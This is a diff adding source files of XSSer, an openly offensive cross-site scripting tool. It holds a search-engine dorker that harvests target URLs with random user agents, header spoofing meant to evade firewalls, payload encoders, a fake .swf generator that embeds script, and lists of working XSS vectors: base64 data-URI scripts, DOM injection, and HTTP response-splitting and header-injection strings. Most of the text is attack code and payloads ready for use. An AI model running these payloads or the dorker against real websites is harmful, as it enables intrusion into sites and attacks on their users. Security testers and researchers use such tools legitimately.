+        #m['size-download'] = str(self.handle.getinfo(pycurl.SIZE_DOWNLOAD))
+        #m['speed-upload'] = str(self.handle.getinfo(pycurl.SPEED_UPLOAD))
+        m['header-size'] = str(self.handle.getinfo(pycurl.HEADER_SIZE))
+        m['request-size'] = str(self.handle.getinfo(pycurl.REQUEST_SIZE))
+        m['response-code'] = str(self.handle.getinfo(pycurl.RESPONSE_CODE))
+        m['ssl-verifyresult'] = str(self.handle.getinfo(pycurl.SSL_VERIFYRESULT))
+        m['content-type'] = (self.handle.getinfo(pycurl.CONTENT_TYPE) or '').strip(';')
+        m['cookielist'] = str(self.handle.getinfo(pycurl.INFO_COOKIELIST))
+        #m['content-length-download'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD))
+        #m['content-length-upload'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_UPLOAD))
+        #m['encoding'] = str(self.handle.getinfo(pycurl.ENCODING))
+        return m
+
+    @classmethod
+    def print_options(cls):
+        """
+        Print selected options.
+        """
+        print "\n[-]Verbose: active"
+        print "[-]Cookie:", cls.cookie
+        print "[-]HTTP User Agent:", cls.agent
+        print "[-]HTTP Referer:", cls.referer
+        print "[-]Extra HTTP Headers:", cls.headers
+        if cls.xforw == True:
+            print "[-]X-Forwarded-For:", "Random IP"
+        else:
+            print "[-]X-Forwarded-For:", cls.xforw
+        if cls.xclient == True:
+            print "[-]X-Client-IP:", "Random IP"
+        else:
+            print "[-]X-Client-IP:", cls.xclient
+        print "[-]Authentication Type:", cls.atype
+        print "[-]Authentication Credentials:", cls.acred
+        if cls.ignoreproxy == True:
+            print "[-]Proxy:", "Ignoring system default HTTP proxy"
+        else:
+            print "[-]Proxy:", cls.proxy
+        print "[-]Timeout:", cls.timeout
+        if cls.tcp_nodelay == True:
+            print "[-]Delaying:", "TCP_NODELAY activate"
+        else:
+            print "[-]Delaying:", cls.delay, "seconds"
+        if cls.followred == True:
+            print "[-]Follow 302 code:", "active"
+            if cls.fli:
+                print"[-]Limit to follow:", cls.fli
+        else:
+            print "[-]Delaying:", cls.delay, "seconds"
+
+        print "[-]Retries:", cls.retries, "\n"
+
+    def answered(self, check):
+        """
+        Check for occurence of a string in the payload from
+        the latest operation.
+        """
+        return self.payload.find(check) >= 0
+
+    def close(self):
+        """
+        Close the curl handle.
+        """
+        self.handle.close()
+        self.header.close()
+        self._closed = True
+
+    def __del__(self):
+        if not self._closed:
+            self.close()

+ 103 - 0
xsser/core/dork.py

@@ -0,0 +1,103 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the xsser project, https://xsser.03c8.net
+
+Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+........
+
+List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
+
+"""
+import urllib2, traceback, re, random
+urllib2.socket.setdefaulttimeout(5.0)
+
+DEBUG = 0
+
+class Dorker(object):
+    def __init__(self, engine='yahoo'):
+        self._engine = engine
+        self.search_engines = [] # available dorking search engines
+        self.search_engines.append('bing')
+        self.search_engines.append('yahoo')
+        self.agents = [] # user-agents
+        try:
+            f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+        except:
+            f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+        for line in f:
+            self.agents.append(line)
+
+    def dork(self, search):
+        """
+        Perform a search and return links.
+        """
+        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
+            search_url = 'https://www.bing.com/search?q="' + search + '"'
+        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
+            search_url = 'https://search.yahoo.com/search?q="' + search + '"'
+        else:
+            print "\n[Error] This search engine is not supported!\n" 
+            print "[Info] List of available:"
+            print '-'*25
+            for e in self.search_engines:
+                print "+ "+e
+            print ""
+        try:
+            self.search_url = search_url
+            print "\n[Info] Search query:", urllib2.unquote(search_url)
+            user_agent = random.choice(self.agents).strip() # set random user-agent
+            referer = '127.0.0.1' # set referer to localhost / WAF black magic!
+            headers = {'User-Agent' : user_agent, 'Referer' : referer}
+            req = urllib2.Request(search_url, None, headers)
+            html_data = urllib2.urlopen(req).read()
+            print "\n[Info] Retrieving requested info..."
+        except urllib2.URLError, e:
+            if DEBUG:
+                traceback.print_exc()
+            print "\n[Error] Cannot connect!"
+            return
+        if self._engine == 'bing':
+            regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
+        if self._engine == 'yahoo':
+            regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
+        pattern = re.compile(regex)
+        links = re.findall(pattern, html_data)
+        found_links = []
+        if links:
+            for link in links:
+                link = urllib2.unquote(link)
+                if self._engine == "yahoo":
+                    if "RU=https://www.yahoo.com/" in link:
+                        link = "" # invalid url
+                if search.upper() in link.upper(): # parse that search query is on url
+                    sep = search
+                    link2 = link.split(sep,1)[0]
+                    if link2 not in found_links: # parse that target is not duplicated
+                        found_links.append(link)
+        else:
+            print "\n[Info] Not any link found for that query!"
+        return found_links
+
+if __name__ == '__main__':
+    for a in ['yahoo', 'bing']:
+        dork = Dorker(a)
+        res = dork.dork("news.php?id=")
+        if res:
+            print "[+]", a, ":", len(res), "\n"
+            for b in res:
+                print " *", b

+ 116 - 0
xsser/core/encdec.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import urllib
+
+class EncoderDecoder(object):
+    """
+    Class to help encoding and decoding strings with different hashing or
+    encoding algorigthms..
+    """
+    # encdec functions:
+    def __init__(self):
+        self.encmap = { "Str" : lambda x : self._fromCharCodeEncode(x), 
+                   "Hex" : lambda x : self._hexEncode(x),
+                   "Hes" : lambda x : self._hexSemiEncode(x),
+                   "Une" : lambda x : self._unEscape(x),
+                   "Dec" : lambda x : self._decEncode(x),
+                   "Mix" : lambda x : self._unEscape(self._fromCharCodeEncode(x))
+                   }
+
+    def _fromCharCodeEncode(self, string):
+        """
+        Encode to string.
+        """
+        encoded=''
+        for char in string:
+            encoded=encoded+","+str(ord(char))
+        return encoded[1:]
+
+    def _hexEncode(self, string):
+        """
+        Encode to hex.
+        """
+        encoded=''
+        for char in string:
+            encoded=encoded+"%"+hex(ord(char))[2:]
+        return encoded
+
+    def _hexSemiEncode(self, string):
+        """
+        Encode to semi hex.
+        """
+        encoded=''
+        for char in string:
+            encoded=encoded+"&#x"+hex(ord(char))[2:]+";"
+        return encoded
+
+    def _decEncode(self, string):
+        """
+        Encode to decimal.
+        """
+        encoded=''
+        for char in string:
+            encoded=encoded+"&#"+str(ord(char))
+        return encoded
+
+    def _unEscape(self, string):
+        """
+        Escape string.
+        """
+        encoded=''
+        for char in string:
+            encoded=encoded+urllib.quote(char)
+        return encoded
+
+    def _ipDwordEncode(self, string):
+        """
+        Encode to dword.
+        """
+        encoded=''
+        tblIP = string.split('.')
+        # In the case it's not an IP
+        if len(tblIP)!=4:
+            return 0
+        for number in tblIP:
+            tmp=hex(int(number))[2:]
+            if len(tmp)==1:
+                tmp='0' +tmp 
+            encoded=encoded+tmp
+        return int(encoded,16)
+	
+    def _ipOctalEncode(self, string):
+        """
+        Encode to octal.
+	"""
+        encoded=''
+        tblIP = string.split('.')
+        # In the case it's not an IP
+        if len(tblIP)!=4:
+            return 0
+        octIP = map(lambda s: oct(int(s)).zfill(4), tblIP)
+        return ".".join(octIP)
+
+if __name__ == "__main__":
+    encdec = EncoderDecoder()
+    print encdec._ipOctalEncode("127.0.0.1")

+ 52 - 0
xsser/core/flashxss.py

@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+
+class FlashInjections(object):
+    
+    def __init__(self, payload =''):
+        self._payload = payload
+
+    def flash_xss(self, filename, payload):
+        """
+        Create -fake- flash movie (.swf) with code XSS injected.
+	"""
+        root, ext = os.path.splitext(filename)
+        if ext.lower() in [".swf"]:
+            f = open(filename, 'wb')
+            user_payload = payload
+            if not user_payload:
+                user_payload = 'a="get";b="URL";c="javascript:";d="alert("XSS");void(0);";eval(a+b)(c+d);'
+            if ext.lower() == ".swf":
+                content = user_payload
+            f.write(content)
+            f.close()
+            flash_results = "\nCode: "+ content + "\nFile: ", root + ext
+        else:
+            flash_results = "\nPlease select a filename with extension .swf"
+        return flash_results
+
+if __name__ == '__main__':
+    flash_xss_injection = FlashInjections('')
+    print flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>")

+ 55 - 0
xsser/core/fuzzing/DCP.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+DCPvectors = [
+		{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
+                  'browser' : """[Data Control Protocol Injection]""" },
+
+		{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
+		  'browser' : """[Data Control Protocol Injection]"""},	
+	
+		#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
+                #  'browser' : """[Data Control Protocol Injection]"""},
+
+		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
+		#  'browser' : """[Data Control Protocol Injection]""" },
+
+		#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
+                #  'browser' : """[Data Control Protocol Injection]""" },
+
+		#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
+                #  'browser' : """[Data Control Protocol Injection]""" },
+
+		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
+                #  'browser' : """[Data Control Protocol Injection]""" },
+
+		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+
+		{ 'payload' : """data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==""",
+                  'browser' : """[Data Control Protocol Injection]""" }
+		]

+ 44 - 0
xsser/core/fuzzing/DOM.py

@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+DOMvectors = [
+		{ 'payload' : """?notname=PAYLOAD""",
+		  'browser' : """[Document Object Model Injection]"""},
+		  
+		{ 'payload' : """?notname=PAYLOAD&""",
+		  'browser' : """[Document Object Model Injection]"""},
+
+		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
+		  'browser' : """[Document Object Model Injection]"""},
+
+		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
+		  'browser' : """[Document Object Model Injection]"""},
+		  
+		{ 'payload' : """?foobar=name=PAYLOAD&""",
+		  'browser' : """[Document Object Model Injection]"""}
+		]
+

+ 66 - 0
xsser/core/fuzzing/HTTPsr.py

@@ -0,0 +1,66 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+HTTPrs_vectors = [
+		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
+			""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
+                  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
+		  'browser' : """[Induced Injection]"""},
+				
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
+			""",
+                  'browser' : """[Induced Injection]"""},
+
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
+			""",
+		  'browser' : """[Induced Injection]""" },
+
+		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
+			""",
+                  'browser' : """[Induced Injection]""" }
+		]
+

+ 20 - 0
xsser/core/fuzzing/__init__.py

@@ -0,0 +1,20 @@
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""

+ 30 - 0
xsser/core/fuzzing/dorks.txt

@@ -0,0 +1,30 @@
+.php?cmd=
+.php?z=
+.php?q=
+.php?search=
+.php?query=
+.php?searchst­ring=
+.php?keyword=­
+.php?file=
+.php?years=
+.php?txt=
+.php?tag=
+.php?max=
+.php?from=
+.php?author=
+.php?pass=
+.php?feedback­=
+.php?mail=
+.php?cat=
+.php?vote=
+search.php?q=
+headersearch.p­hp?sid=
+/news.php?id=
+/search_results.php?search=
+/notice.php?msg= 
+/view.php?PID= 
+/search.php?search_keywords=
+/contentPage.php?id= 
+/main.php?sid=
+/feedpost.php?url=
+/poll/­default.asp?catid=

+ 104 - 0
xsser/core/fuzzing/heuristic.py

@@ -0,0 +1,104 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+heuristic_test = [
+		# ascii
+		{ 'payload' : """XSS\\XSS""",
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS/XSS""",
+		  'browser' : """[Heuristic test]""" },
+				
+		{ 'payload' : """XSS>XSS""",
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS<XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS;XSS""",
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS'XSS""",
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : '''XSS"XSS''',
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS=XSS""",
+                  'browser' : """[Heuristic test]""" },
+                # hex/une
+		{ 'payload' : """XSS%5CXSS""",
+		  'browser' : """[Heuristic test]""" },
+                # / is the same on Unicode than in ASCII
+                #{ 'payload' : """XSS/XSS""",
+                #  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS%3EXSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS%3CXSS""",
+		  'browser' : """[Heuristic test]""" },
+		
+		{ 'payload' : """XSS%3BXSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS%27XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : '''XSS%22XSS''',
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS%3DXSS""",
+		  'browser' : """[Heuristic test]""" },
+                # dec
+		{ 'payload' : """XSS&#92XSS""",
+		  'browser' : """[Heuristic test]""" },
+		
+		{ 'payload' : """XSS&#47XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS&#62XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS&#60XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS&#59XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS&#39XSS""",
+		  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : '''XSS&#34XSS''',
+                  'browser' : """[Heuristic test]""" },
+
+		{ 'payload' : """XSS&#61XSS""",
+		  'browser' : """[Heuristic test]""" }
+
+		]
+
+

+ 95 - 0
xsser/core/fuzzing/user-agents.txt

@@ -0,0 +1,95 @@
+Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
+Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.811.0 Safari/535.1
+Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30
+Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5
+Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
+Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0
+Mozilla/6.0 (Windows; U; Windows NT 7.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.9 (.NET CLR 3.5.30729)
+Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9
+Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
+Mozilla/5.0 (Windows; U; Windows NT5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5
+Mozilla/5.0 (Windows; U; Win98; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1
+Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.6) Gecko/20040207 Firefox/0.8
+Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9
+Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)
+Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
+Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
+Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
+Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)
+Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
+Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
+Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; yie8)
+Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Zango 10.1.181.0)
+Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
+Mozilla/4.0 (compatible; MSIE 6.0; AOL 8.0; Windows NT 5.1; SV1)
+Mozilla/5.0 (X11; Ubuntu; Linux armv7l; rv:17.0) Gecko/20100101 Firefox/17.0
+Mozilla/2.02E (Win95; U)
+Mozilla/5.0 (iPhone; U; CPU iOS 2_0 like Mac OS X; en-us)
+Mozilla/5.0 (Linux; U; Android 0.5; en-us)
+Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
+Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
+Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)
+Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Whistler/20110021 myibrow/5.0.0.0
+Mozilla/4.08 [en] (WinNT; I ;Nav)
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Oupeng/10.2.1.86910 Safari/534.30
+Mozilla/5.0 (SMART-TV; Linux; Tizen 2.3) AppleWebkit/538.1 (KHTML, like Gecko) SamsungBrowser/1.0 Safari/538.1
+myibrow/2.2 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080001 My Internet Browser/2.2.0.0 20080913235045
